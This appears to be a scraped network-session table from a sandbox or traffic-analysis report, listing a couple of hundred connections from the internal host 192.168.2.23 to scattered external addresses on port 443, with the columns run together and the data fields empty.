                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12818192.168.2.233429091.178.252.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12819192.168.2.2336102168.111.18.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12820192.168.2.235883061.177.23.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12821192.168.2.2350684107.251.202.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12822192.168.2.2355818113.72.181.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12823192.168.2.235116467.234.104.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12824192.168.2.235090841.62.131.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12825192.168.2.2350214125.225.100.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12826192.168.2.2360236173.185.135.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12827192.168.2.2347126140.166.151.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12828192.168.2.2358586151.85.198.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12829192.168.2.2346774103.155.170.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12830192.168.2.2339188196.20.240.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12831192.168.2.234861494.62.49.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12832192.168.2.2333166117.177.184.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12833192.168.2.234402479.146.94.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12834192.168.2.235931846.250.37.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12835192.168.2.2354034188.108.25.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12836192.168.2.2341246156.237.165.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12837192.168.2.235793879.199.91.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12838192.168.2.234780414.96.138.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12839192.168.2.2337810118.229.164.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12840192.168.2.2345746204.63.225.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12841192.168.2.235610661.106.38.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12842192.168.2.235310842.246.250.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12843192.168.2.2339578189.241.160.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12844192.168.2.2333364163.215.177.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12845192.168.2.2340444180.253.166.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12846192.168.2.2339564191.34.201.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12847192.168.2.234995219.186.95.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12848192.168.2.235389259.215.242.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12849192.168.2.2350366223.151.8.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12850192.168.2.233583451.150.32.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12851192.168.2.234457095.26.13.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12852192.168.2.235798418.74.80.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12853192.168.2.2348826174.38.124.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12854192.168.2.2348826183.205.108.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12855192.168.2.2354044123.228.229.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12856192.168.2.2344632198.197.253.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12857192.168.2.235863036.18.185.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12858192.168.2.2355068129.210.91.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12859192.168.2.2354226141.211.243.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12860192.168.2.2349968204.246.204.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12861192.168.2.2347136106.159.118.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12862192.168.2.23488942.38.214.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12863192.168.2.2348088151.190.153.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12864192.168.2.234330844.212.9.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12865192.168.2.234067866.158.33.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12866192.168.2.233407441.57.87.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12867192.168.2.2343786175.143.101.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12868192.168.2.2359762203.106.57.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12869192.168.2.2357588191.7.107.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12870192.168.2.235794697.135.152.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12871192.168.2.2341720196.102.40.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12872192.168.2.2358932144.153.63.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12873192.168.2.236055486.86.34.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12874192.168.2.2356356108.29.245.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12875192.168.2.2348814190.119.43.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12876192.168.2.234099212.211.160.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12877192.168.2.235805844.111.137.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12878192.168.2.2359776157.217.210.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12879192.168.2.2346984115.236.170.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12880192.168.2.235906457.189.221.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12881192.168.2.235911675.59.179.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12882192.168.2.23408361.101.150.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12883192.168.2.2336654213.31.216.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12884192.168.2.2350912170.34.149.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12885192.168.2.235018260.139.176.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12886192.168.2.2341858188.127.42.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12887192.168.2.2343702130.150.171.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12888192.168.2.2357128133.247.244.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12889192.168.2.2335474168.36.23.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12890192.168.2.23435282.160.76.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12891192.168.2.2356074173.150.38.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12892192.168.2.234215657.24.232.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12893192.168.2.2349512131.1.102.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12894192.168.2.235941642.243.59.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12895192.168.2.2334374161.218.169.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12896192.168.2.23548509.124.211.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12897192.168.2.234230488.238.103.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12898192.168.2.235923097.51.43.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12899192.168.2.23601408.28.37.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12900192.168.2.2338600126.51.58.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12901192.168.2.23374368.255.185.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12902192.168.2.2339218121.249.48.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12903192.168.2.2338794154.252.3.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12904192.168.2.234211460.186.56.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12905192.168.2.233942281.143.23.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12906192.168.2.235429419.158.241.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12907192.168.2.233970696.12.1.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12908192.168.2.2358794220.25.35.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12909192.168.2.234824477.133.242.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12910192.168.2.233994024.88.194.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12911192.168.2.2337808112.171.201.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12912192.168.2.235878691.80.94.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12913192.168.2.2341578221.31.250.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12914192.168.2.235669618.165.246.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12915192.168.2.2359722194.67.255.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12916192.168.2.2352748157.130.93.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12917192.168.2.234429080.16.12.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12918192.168.2.2343444116.225.241.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12919192.168.2.2343460208.7.98.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12920192.168.2.233928613.66.207.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12921192.168.2.233446490.134.239.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12922192.168.2.2360618117.134.127.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12923192.168.2.2356896151.11.32.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12924192.168.2.234003612.71.182.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12925192.168.2.233392692.29.141.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12926192.168.2.2352824119.155.213.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12927192.168.2.2356918114.243.82.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12928192.168.2.233574088.155.233.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12929192.168.2.2356860145.212.35.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12930192.168.2.2360688218.178.31.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12931192.168.2.2357570110.234.157.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12932192.168.2.2340184223.17.116.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12933192.168.2.233743882.67.80.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12934192.168.2.234883839.112.92.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12935192.168.2.2359024131.162.216.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12936192.168.2.234695847.39.73.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12937192.168.2.2354732161.75.162.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12938192.168.2.2334686116.159.112.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12939192.168.2.2354084114.119.48.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12940192.168.2.235961853.216.156.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12941192.168.2.2356540218.8.73.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12942192.168.2.2338796145.202.244.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12943192.168.2.2348652113.191.7.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12944192.168.2.2334028211.230.196.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12945192.168.2.2353010161.153.189.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12946192.168.2.2348434152.135.202.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12947192.168.2.234677298.32.169.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12948192.168.2.2347544101.127.6.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12949192.168.2.235222658.245.11.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12950192.168.2.2351840163.5.15.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12951192.168.2.234156654.244.249.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12952192.168.2.235014690.249.113.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12953192.168.2.2345026122.203.187.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12954192.168.2.2339368190.49.244.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12955192.168.2.236067284.238.76.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12956192.168.2.2343024204.189.150.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12957192.168.2.2344752218.205.116.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12958192.168.2.234040431.66.4.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12959192.168.2.2340244138.50.253.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12960192.168.2.2334988188.124.153.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12961192.168.2.234435423.74.41.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12962192.168.2.234318889.132.103.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12963192.168.2.2339360101.73.25.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12964192.168.2.234747290.92.245.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12965192.168.2.2351670216.201.218.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12966192.168.2.233809088.214.180.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12967192.168.2.234821027.198.158.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12968192.168.2.234153295.167.96.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12969192.168.2.2354770191.238.51.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12970192.168.2.234082281.171.125.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12971192.168.2.2335878100.165.172.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12972192.168.2.236071097.139.192.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12973192.168.2.236056272.252.207.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12974192.168.2.2337722198.162.114.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12975192.168.2.233937836.247.37.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12976192.168.2.2339944165.223.100.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12977192.168.2.235088265.91.21.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12978192.168.2.236050483.11.108.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12979192.168.2.2344120115.148.195.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12980192.168.2.2338240132.140.187.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12981192.168.2.2332994200.89.218.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12982192.168.2.235512442.179.173.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12983192.168.2.2333736148.111.14.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12984192.168.2.2333130152.207.164.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12985192.168.2.2354052103.41.57.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12986192.168.2.2343864182.228.38.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12987192.168.2.233754840.4.17.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12988192.168.2.2333348187.158.251.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12989192.168.2.2348784161.134.152.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12990192.168.2.2354488158.37.102.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12991192.168.2.2351358107.67.0.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12992192.168.2.2359990171.96.245.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12993192.168.2.233700869.33.177.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12994192.168.2.2355612132.120.55.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12995192.168.2.2351122187.166.156.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12996192.168.2.2339040194.82.66.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12997192.168.2.2341990165.147.136.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12998192.168.2.2356954110.87.151.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12999192.168.2.2353202153.28.129.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13000192.168.2.234808868.151.179.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13001192.168.2.23463784.222.147.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13002192.168.2.2338210223.34.46.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13003192.168.2.233489427.56.168.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13004192.168.2.2351466146.117.124.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13005192.168.2.2342798206.152.214.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13006192.168.2.2334394217.70.23.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13007192.168.2.2343350149.146.208.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13008192.168.2.233512058.173.68.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13009192.168.2.2335396202.89.43.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13010192.168.2.234133839.21.51.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13011192.168.2.234785854.99.249.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13012192.168.2.2356754222.145.213.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13013192.168.2.2340326101.37.83.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13014192.168.2.2353514189.20.199.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13015192.168.2.2353244107.214.109.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13016192.168.2.2353744148.58.165.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13017192.168.2.235879070.205.133.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13018192.168.2.234599441.93.171.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13019192.168.2.235972623.63.246.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13020192.168.2.2335678114.82.16.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13021192.168.2.235490072.130.83.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13022192.168.2.235414462.155.232.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13023192.168.2.23559485.205.254.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13024192.168.2.2347396208.142.121.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13025192.168.2.2355224220.140.106.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13026192.168.2.234099877.22.238.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13027192.168.2.2360790182.172.1.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13028192.168.2.233528049.211.152.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13029192.168.2.2360464121.237.73.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13030192.168.2.2334242186.69.59.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13031192.168.2.234213466.57.67.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13032192.168.2.235764891.128.41.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13033192.168.2.2348110187.155.70.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13034192.168.2.2346574200.214.185.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13035192.168.2.2342086130.84.11.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13036192.168.2.234185693.240.248.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13037192.168.2.235618020.68.54.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13038192.168.2.233658012.37.38.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13039192.168.2.2360664210.242.152.197443
